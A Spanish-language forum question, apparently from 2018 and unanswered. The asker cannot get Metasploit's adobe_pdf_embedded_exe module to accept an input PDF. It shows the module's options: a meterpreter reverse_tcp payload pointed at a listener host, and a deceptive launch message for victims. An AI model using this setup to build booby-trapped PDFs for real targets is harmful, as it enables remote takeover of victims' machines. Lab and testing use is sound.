Metasploit INFILENAME: opción no válida

0

Estoy usando MSF en Kali pero me encontré con un problema.

Estoy probando adobe_pdf_embedded_exe y configuré INFILENAME en readme.pdf. Todo lo demás funciona bien, pero cuando intento ejecutarlo con el comando exploit , me da esto:

msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options

Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):

   Name            Current Setting                                                                                     Required  Description
   ----            ---------------                                                                                     --------  -----------
   EXENAME                                                                                                             no        The Name of payload exe.
   FILENAME        readme.pdf                                                                                          no        The output filename.
   INFILENAME      /root/desktop/readme.pdf                                                                            yes       The Input PDF filename.
   LAUNCH_MESSAGE  To view the encrypted content please tick the "Do not show this message again" box and press Open.  no        The message to display in the File: area


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.100.1      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)


msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit

[-] Exploit failed: The following options failed to validate: INFILENAME."

He intentado establecer INFILENAME en la ruta: /root/desktop/readme.pdf Pero sigue dando el mismo error.

También, creé el pdf haciendo un documento de Google y exportándolo como un pdf. No sé qué hacer.

    
pregunta Zazman 28.06.2018 - 09:13
fuente

0 respuestas

Lea otras preguntas en las etiquetas